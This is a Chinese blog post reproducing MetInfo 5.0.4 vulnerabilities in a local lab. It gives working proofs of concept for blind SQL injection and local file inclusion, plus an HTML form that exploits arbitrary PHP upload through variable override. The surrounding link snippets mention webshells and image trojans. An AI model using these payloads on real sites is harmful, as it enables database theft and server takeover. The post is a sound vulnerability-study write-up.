metinfov5.0.4漏洞复现

最新推荐文章于 2024-09-18 21:39:11 发布
最新推荐文章于 2024-09-18 21:39:11 发布
阅读量3.8k 收藏 6
点赞数 3
分类专栏: 网络安全
转载请保留出处,更多干货请关注微信公众号,句芒实验室,感谢!
本文链接:https://blog.csdn.net/key_book/article/details/80604830
版权

metinfov5.0.4漏洞复现

最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞.
简单讲就是用户传进去的值变成了一个新的变量覆盖了原代码的变量,从而被我们利用.
产生的原因是因为编程人员在进行变量传值时,使用了双(“$$”)符号 .

下面开始漏洞复现

测试环境:
phpstudy #一个集成环境包含php+mysql
php源码(cms)
metinfov5.0.4 #源码大家可以去网上下载

测试目标:
三个经典漏洞:
SQLi(注入)
文件包含
文件上传

漏洞位置:
SQLi 注入漏洞位置:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22

POC:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22 and if(ord(substr(database(),1,1))=109,sleep(5),0) –+

此处采用盲注,POC的语句解释为,首先获取数据库名称,然后截取第一个字符,将截取到的字符转换为ASCII码与猜想的ASCII码做比较,如果满足条件,也是说我们猜想正确,沉睡5秒,以此来爆出库名,之后以此类推,爆表,字段,内容等等,当我们得到第一个字符后,我们可以进入数据库和我们的库名进行比较,发现第一个字符一致,证明注入成功.

文件包含漏洞位置:
http://localhost/metinfoV5.0.4/about/index.php

POC: http://localhost/metinfoV5.0.4/about/index.php?fmodule=7&module=../../phpinfo.php

为了帮助我们更好的理解,我们可以先在www目录下写一个phpinfo.php的文件,接着使用文件包含进行打开,发现成功打开,证明了此处存在文件包含漏洞.

文件上传漏洞位置:
http://localhost/metinfoV5.0.4/admin/include/uploadify.php

POC:
http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp

为了便于利用,我们把它写成一个HTML文件: 

<meta charset="utf-8">
<form
    enctype="multipart/form-data"
    method="post"
    name="myfrom"
    action="http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp"
>
    <input name="Filedata" type="file" size=20>
    <input type="submit" name="Submit" value="提交信息">
</form>

之后我们只要打开写好的html文件选择.php格式的文件上传就可以了!上传成功后,我们进入该网站的upload/file/目录下,发现我们的上传文件,证明,文件上传漏洞实现.

到此,漏洞复现基本完成,剩下的就是漏洞产生的原因了,由于时间有限,就不一一分析原因了,大家有兴趣的可以去分析源代码,来找出产生的原因.

metinfo_5.0.4 任意文件本地包含漏洞复现metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 664
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
Metinfo_5.0.4 布尔盲注漏洞复现以及exp编写
oyqsb的博客
07-22 208
布尔盲注一般适用于页面没有回显字段,但页面回显有True 或者 false两种情况,利用and,or等关键字来构造SQL语句,再利用页面返回true或false来判断是否执行成功,从而达到注入的目的来获取信息。利用and 1=1 和 1=2 判断出布尔盲注。利用length函数判断出数据库长度为11。
【文件包含】metinfo 5.0.4 文件包含漏洞复现
wj33333的博客
11-15 404
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 5.0.4版本中的/metinfo_5.0.4/about/index.php?fmodule文件存在任意文件包含漏洞。攻击者可利用漏洞读取网站上的敏感文件。
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复
最新发布
baimao__Ch的博客
09-18 998
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
metinfo_5.0.4_filein-Include漏洞复现
m0_64583632的博客
02-06 396
metinfo_5.0.4_filein-Include漏洞复现
metinfo_5.0.4_file-upload
weixin_43886198的博客
12-21 1339
metinfo_5.0.4_file-upload 漏洞描述 MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞漏洞危害等级 高危 影响版本 5.0.4 漏洞复现 基础环境 组件 版本 OS Windows 2008 R2 x64 Web Server phpStudy 2016(特别版) Source Code MetInfoV5.0.4 漏洞演示 本地构造HTML 表单,进行文件上传 变量覆盖,SQL注入(# %23),双写绕过。
[漏洞复现]metinfo5.0.4文件包含
feigerger的博客
08-31 163
metinfo5.0.4文件包含漏洞复现
finecms存在任意文件上传漏洞复现
炙热的酷盖
08-05 3036
因为自己淋过雨,所以不想别人湿鞋 漏洞环境:finecms公益软件 finecms 存在任意文件上传:MIME验证 fofa: title=“FineCMS公益软件” && country=“CN” 首先注册一个账号yy 上传一个真实图片 3. 打开burpsuite进行抓包和改包 4. 制作图片马  准备一个正常图片1.jpep  准备一个php一句话木马1.php  将1.jpep和1.php放入相同路径下  cmd命令进入路径输入命令:copy 1.jpeg/a +1
Spring框架漏洞复现大杂烩!!!
热门推荐
SoulCat
02-27 2万+
Spring框架漏洞复现大杂烩!!! 寻了半生的春天 你一笑 便是了 总体概述: Spring是一个开源框架,核心是控制反转(IoC)和面向切面(AOP)。简单来说,Spring是一个分层的JavaSE/EE full-stack(一站式) 轻量级开源框架。简单说就是创建对象由以前的程序员自己new 构造方法来调用,变成交由Spring来创建对象 。类比Struts 2框架绝大部分的安全漏洞...
亿景企业网站管理系统
01-22
亿景企业网站管理系统是面向中小企业的网站管理系统,网页精美、大气。具有稳性定强,功能多、安全、代码加载速度快、网站内容管理的易操作性、维护方便等优点。采用div+css构架,是中小型企业建站的理想选择。...
冠龙科技企业网站管理系统
12-06
冠龙科技企业建站系统CMS是基于ASP开发的一套网络管理系统,正常使用该系统您必须保证您的服务器满足如下要求: 1) 软件系统:WIN2000+IIS5.0 / WINXP+IIS5.1 / WIN2003+IIS6.0 2) 数 据 库:Access2000 3) 其 他:服务器必须安装 微软IE浏览器5.0或以上版本 使用Email功能,需要安装Jmail 4.0或以上版本 部分功能需要服务器支持FSO(FileSystemObject) 推荐:Windows 2000+IIS5.0+Access2000+IE5.5环境测试
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 572
metinfo 、文件上传、漏洞、一句话木马
metinfo_5.0.4_lfi
qq_45212316的博客
01-18 512
fmodule=7&module=c://windows/system32/drivers/etc/hosts】,此时我们已经改变了$module的值,其值为hosts文件的绝对路径。搜索fmodule 变量,发现只有当 fmodule 变量,发现只有当fmodule变量,发现只有当fmodule!发现输出了我们传进去的module的参数,所以接下来配合远程包含,上传图片马,在图片马里加入代码。如何证明该漏洞是文件包含漏洞,如果在执行命令后PHP代码执行了,那么就是文件包含漏洞。尝试输出$module。
[漏洞复现] MetInfo5.0.4文件包含漏洞
Da1NtY的博客
06-28 471
漏洞出现在中,因为利用了动态地址,所以存在漏洞漏洞检查语句(!
metinfo 5.0.4 文件包含漏洞复现
一个努力学习网安的小牛马
11-15 290
metinfo cms 版本 5.0.4
漏洞复现Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 749
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
Metlnfo CMS全版本漏洞收集
weixin_30360497的博客
08-24 711
根据https://www.seebug.org/appdir/MetInfo进行书写。 [版本:Metlnfo 4.0] 漏洞标题:Metlnfo cms任意用户密码修改 漏洞文件:member/save.php 85-111行代码: if($action=="editor"){ $query = "update $met_admin_table SET...
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 2019
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
利用woeusb-5.0.4.bash制作Windows启动U盘
资源摘要信息: "woeusb-5.0.4.bash" ### 知识点1: 创建可启动Windows USB驱动器 标题中提到的 "Create bootable windows usb disk" 意味着该文件 "woeusb-5.0.4.bash" 与创建可启动的Windows USB驱动器有关。可...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值